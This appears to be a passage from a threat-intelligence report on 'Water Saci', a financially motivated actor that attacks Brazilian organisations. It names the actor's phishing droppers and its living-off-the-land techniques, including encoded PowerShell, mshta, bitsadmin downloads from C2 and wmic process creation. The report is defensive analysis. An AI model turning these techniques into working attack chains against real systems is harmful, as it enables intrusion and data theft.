Linkedin X-twitter
    • November 13, 2025

    Threat Actor: Water Saci

    A newly identified, financially motivated threat actor, tracked as Water Saci, has been linked to a sustained, multi-year campaign primarily targeting Brazil’s financial, e-commerce, telecommunications, and government sectors. This actor, believed to be Portuguese-speaking and Brazilian-based, has been operational since at least July 2019 and has continued its activities through at least February 2024.

    The primary objective of Water Saci is financial gain, achieved through the deployment of a custom malware toolkit, including a stealer component tracked as ‘Saci.Stealer’. This campaign is notable for its scale and its highly specific data-targeting objectives. Intelligence indicates the operation has already affected over 1,000 companies and compromised the data of more than 1.5 million individuals.

    The stealer malware is explicitly designed to search for and exfiltrate financial data, with a specific and notable focus on information related to Brazil’s PIS (Payment Information System).

    The 2019-2024 operational timeline is a critical finding. It indicates that Water Saci is not an emerging, opportunistic threat, but rather a mature, persistent, and stealthy group that has successfully operated below the radar of public threat intelligence for at least five years. This longevity implies a sophisticated understanding of operational security and an ability to maintain long-term access to victim environments. For security operations, this means any incident response or threat-hunting engagement related to this actor must assume a potential compromise timeline measured in years, not days, necessitating a thorough review of historical logs for evidence of intrusion.

    Furthermore, the specific targeting of PIS data, as opposed to generic credit card (PCI) or personally identifiable information (PII), signals a highly specialized adversary. This demonstrates a deep, expert-level knowledge of the Brazilian financial ecosystem and its specific data structures. The actor is not engaging in opportunistic, broad-spectrum data theft; they are conducting a surgical operation to acquire a specific dataset, which they have likely already established a clear monetization path for. This specificity also has direct implications for defenders: standard Data Loss Prevention (DLP) policies configured to detect common formats like credit card numbers or Social Security numbers will likely fail to detect the exfiltration of PIS data. Effective defense requires custom DLP signatures and detection rules built to recognize the unique structure and format of PIS data.

    Actor Profile

    Water Saci is a sophisticated criminal enterprise characterized by its clear motivation, strong regional nexus, and effective blend of custom and commodity tooling.

    • Attribution and Origin: The group is tracked as Water Saci. Analysis of command-line activity and artifacts within their custom scripts reveals the consistent use of Portuguese-language commands and variable names. This linguistic evidence, combined with the group’s exclusive and long-term targeting of Brazilian entities, points with high confidence to a threat actor of Brazilian origin whose operators are native Portuguese speakers.
    • Motivation: The actor’s motivation is unequivocally financial. This is demonstrated by their consistent targeting of data-rich financial, e-commerce, and telecommunications entities, and by the core function of their custom Saci.Stealer malware, which is designed to identify and exfiltrate valuable financial and payment system data. This is not an espionage-focused or hacktivist group; it is a professional, for-profit criminal organization.
    • Development Capability: Water Saci is not a low-skill actor reliant on purchased or open-source tools. The group maintains and deploys its own custom malware toolkit. This demonstrates a clear in-house software development capability, which allows them to bypass signature-based defenses, rapidly re-tool in response to public disclosures, and craft payloads specifically designed for their targets.

    This actor’s operational methodology is defined by a deliberate, hybrid “custom-then-commodity” TTP model. This represents a conscious operational security trade-off. The actor uses their custom ‘Saci’ toolkit for the most critical-path components of their attack, such as the final-stage stealer. This “crown jewel” malware, being unknown to security vendors, has a higher chance of executing successfully.

    However, for nearly all other phases of the attack—including execution, defense evasion, persistence, and lateral movement—Water Saci operators rely heavily on “Living off the Land” (LotL) binaries and common administrative tools. They extensively use built-in Windows utilities like powershell.exe, wmic.exe, bitsadmin, and schtasks.exe, as well as common sysadmin tools like PsExec and Remote Desktop Protocol (RDP).

    This is a calculated strategy. While the custom malware provides stealth for the payload, the use of commodity tools allows the actor’s post-compromise activity to blend in with the “noise” of legitimate administrative activity. For a SOC, this means that while perimeter defenses might eventually detect the custom malware, the actor, once inside the network, will be exceptionally difficult to distinguish from a systems administrator. This strategy effectively shifts the defensive battleground from the network perimeter to the endpoint, placing the burden of detection on organizations’ ability to log, analyze, and identify anomalous process-level activity and command-line arguments, rather than relying on network-based signatures.

    Targeting and Victimology

    Water Saci’s targeting is highly focused and geographically concentrated, reflecting its deep understanding of the Brazilian market.

    • Geographic Focus: All known victims of the Water Saci campaign are located in Brazil. There is currently no evidence to suggest this actor is operating outside of this geographic boundary.
    • Industry Verticals: The actor demonstrates a clear targeting pattern, focusing on data-rich environments where financial information is aggregated. Observed victims fall into four primary sectors:
      • Telecommunications
      • E-commerce
      • Financial Services
      • Government
    • Scale of Operations: The campaign has achieved a significant scale, impacting over 1,000 companies. The resulting data breach has compromised the personal and financial information of more than 1.5 million individuals.

    The breadth of this victimology, spanning from high-security targets like government and financial services to high-volume, lower-security targets like e-commerce, suggests a sophisticated, tiered targeting strategy. Achieving a compromise-footprint of over 1,000 companies through individual, “hands-on-keyboard” attacks is resource-intensive and impractical.

    A more probable scenario is that Water Saci employs a supply chain or “island hopping” methodology. The actor may initially compromise softer targets, such as smaller e-commerce sites or telecommunications providers, to use as a vector. These initial compromises could serve multiple purposes:

    1. Credential Harvesting: Steal administrative or user credentials that may be re-used, allowing access to other, higher-value services.
    2. Island Hopping: Use the compromised partner or supplier organization as a trusted “island” from which to launch subsequent attacks against primary targets (e.g., a financial institution that uses the compromised telecommunications provider for services).

    For a SOC at a high-value financial or government target, this implication is critical: their defensive perimeter is not limited to their own infrastructure. The security posture of their third-party partners and suppliers represents a viable and actively exploited attack vector by this threat actor. The 1.5 million compromised individuals are the collateral damage; the 1,000 companies are the primary targets, likely used as both sources of data and stepping stones to one another.

    Technical Analysis: Attack Chain

    Water Saci’s attack chain is a multi-stage process that leverages commodity vectors for initial access before transitioning to a more sophisticated “Living off the Land” approach for internal movement and execution.

    Initial Compromise and Foothold

    The actor gains an initial foothold through high-volume, common initial access vectors that target end-users.

    • Phishing: The primary vector is phishing emails. These emails use common but effective social engineering lures, such as fake software updates, financial invoices, or payment notifications.
    • Payload: The malicious attachments are typically first-stage droppers, such as malicious VBScript (.vbs) or Windows Shortcut (.LNK) files.
    • Drive-by-Compromise: The actor is also known to use drive-by compromise techniques, likely by compromising legitimate websites to redirect visiting users to actor-controlled infrastructure that delivers the initial payload.

    Execution and Defense Evasion

    This phase of the attack is “noisy” from a process-logging perspective and provides significant detection opportunities. The actor relies on a core set of Windows scripting engines and LotL binaries.

    • Scripting Engines: The initial .vbs payloads are executed via the built-in Windows Script Host engines, wscript.exe and cscript.exe.
    • PowerShell: The actor makes extensive use of obfuscated PowerShell commands. The hallmark of their activity is the use of powershell.exe -e (or -encodedcommand). This indicates a Base64-encoded payload, a common technique to achieve fileless execution and bypass simple, signature-sased antivirus scanners that look for malicious .ps1 files on disk.
    • Living off the Land (LotL) Binaries: Water Saci’s TTPs are characterized by a “holy trinity” of built-in Windows binaries used for defense evasion and payload delivery:
      1. mshta.exe: This binary is used to download and execute remote HTA (HTML Application) payloads. It is a favored tool for actors as it is a signed, trusted Microsoft binary that can execute script-based logic, often bypassing application whitelisting rules.
      2. bitsadmin: This command-line tool is used to download subsequent payloads (such as the Saci.Stealer) from C2 infrastructure. The BITS (Background Intelligent Transfer Service) is a legitimate Windows component, and its traffic is often proxied by the OS and trusted by firewalls, making it an effective tool for covertly downloading malware.
      3. wmic.exe: The actor uses the Windows Management Instrumentation Command-line tool for process creation, specifically via wmic.exe process call create. This is a well-known defense evasion technique. When a process is created with this command, its parent process is